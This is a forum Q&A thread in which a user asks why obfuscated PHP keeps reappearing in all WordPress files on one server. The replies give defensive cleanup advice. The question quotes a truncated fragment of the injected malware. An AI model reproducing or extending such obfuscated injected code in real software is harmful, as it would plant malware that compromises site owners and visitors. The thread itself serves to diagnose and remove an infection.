# Strange code added in all php files

Tags: php, wordpress

Please help me.

all of my WordPress sites has been added some strange code in all php files(core, theme, plugin..)
I've spent a lot of time to delete it, but it keep coming back. I did not install anything insecure but I'm not sure because I'm working with a lot of people so really don't know what have happened?

The strange code looks

```
  "<?php $eqrqdvc = '.2`hA  x27pd%6<C   x27pd%6|6.7eu{66~67<&o! x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24-    xssbz)#44ec:649#-!#:618d5f9#-!#f6c68    x24-    x24-tusqpt)%z-#:#*  ......"
```

all of my sites on the same server are in this trouble at the same time, do you think the cause maybe on sever or can possibly in one site?

Comment: Your wordpress installation has been compromised by a root kit or something else. This could be the result of a non consequently updated / outdated wordpress version or a insecure plugin. You have to change your ftp credentials first. then detext the root kit. To make it easier: delete the physical files and deploy a backup of your site. You don 't have a backup? Bad for you ...

Comment: you have been hacked. roll back to your last clean backup, update **all** components, disable all non-essential plugins, change all your password, inform all your users about the data breach.

Comment: You've been hacked my friend, maybe you are using an outdated plugins in your sites, or you downloaded a nulled premium plugin because you did not want to pay,. Re install your wordpress

Comment: Yes...it seems site has been hacked...check permission of foles / folders..update wp-config.php and xmlrpc.php file and permission.disable all third party pluign or you can test site by disable all pluigns up to some time limit.

Answer (score 7, accepted):

You have been hacked.

Although you are cleaning all these files, you have a security hole that can be exploited again and again.

The best thing you can do is to backup your database delete everything and then perform a clean install, with up-to-date plugins.

Of course you will need to change all passwords and monitor the site.

If you want to dig into the origin of the infection, I suggest to start looking into your log files. Paying special attention to the POST requests. If you have enough history you will probably find something interesting.

Answer (score 1):

It seems like virus, to remove this code from wordpress files could you:

- Update Wordpress core;
- If your Wp is already updated, run a new rewrite update;
- Update theme before saving css and edited parts;
- Be sure to set correctly chmod permission: take a look there https://codex.wordpress.org/Changing_File_Permissions